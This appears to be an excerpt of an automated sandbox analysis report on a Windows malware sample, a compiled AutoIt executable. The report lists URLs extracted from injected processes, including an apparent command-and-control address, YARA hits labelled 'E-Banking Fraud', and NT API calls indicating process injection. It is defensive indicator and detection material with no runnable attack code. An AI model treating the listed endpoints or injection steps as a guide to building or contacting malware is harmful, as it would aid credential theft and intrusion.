                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zhonglangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003386000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: chkntfs.exe, 00000006.00000003.2758698747.0000000007540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://white.anva.org.cn/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.12377.cn/
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zzlz.gsxt.gov.cn/
                Source: C:\Users\user\Desktop\1162-201.exe | Code function: 0_2_00C3912D GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW
                Source: C:\Users\user\Desktop\1162-201.exe | Code function: 0_2_00CB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 1162-201.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1162-201.exe, 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_32a51be0-2
                Source: 1162-201.exe, 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29504cec-f
                Source: 1162-201.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_54b654d6-5
                Source: 1162-201.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ff353706-1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D0D3 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D70 NtOpenThread
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_044C3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_024A9B80 NtCreateFile
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_024A9E80 NtClose
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_024A9FE0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_024A9CF0 NtReadFile
                Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 6_2_024A9DE0 NtDeleteFile
                Source: C:\Users\user\Desktop\1162-201.exe | Code function: 0_2_00C8D5EB: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\1162-201.exe | Code function: 0_2_00C81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\1162-201.exe | Code function: 0_2_00C8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD22_2_03203FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD52_2_03203FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045424466_2_04542446
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045344206_2_04534420
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453E4F66_2_0453E4F6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044905356_2_04490535
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045505916_2_04550591
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AC6E06_2_044AC6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044B47506_2_044B4750
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044907706_2_04490770
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448C7C06_2_0448C7C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045220006_2_04522000
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045181586_2_04518158
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044801006_2_04480100
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452A1186_2_0452A118
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045481CC6_2_045481CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045441A26_2_045441A2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045501AA6_2_045501AA
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045302746_2_04530274
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045102C06_2_045102C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454A3526_2_0454A352
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045503E66_2_045503E6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449E3F06_2_0449E3F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04490C006_2_04490C00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04480CF26_2_04480CF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04530CB56_2_04530CB5
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449AD006_2_0449AD00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452CD1F6_2_0452CD1F
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448ADE06_2_0448ADE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A8DBF6_2_044A8DBF
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04490E596_2_04490E59
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454EE266_2_0454EE26
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454EEDB6_2_0454EEDB
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454CE936_2_0454CE93
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A2E906_2_044A2E90
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04504F406_2_04504F40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04532F306_2_04532F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D2F286_2_044D2F28
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044B0F306_2_044B0F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04482FC86_2_04482FC8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449CFE06_2_0449CFE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0450EFA06_2_0450EFA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449A8406_2_0449A840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044928406_2_04492840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044BE8F06_2_044BE8F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044768B86_2_044768B8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A69626_2_044A6962
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044929A06_2_044929A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0455A9A66_2_0455A9A6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448EA806_2_0448EA80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454AB406_2_0454AB40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04546BD76_2_04546BD7
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044814606_2_04481460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F43F6_2_0454F43F
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045475716_2_04547571
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045595C36_2_045595C3
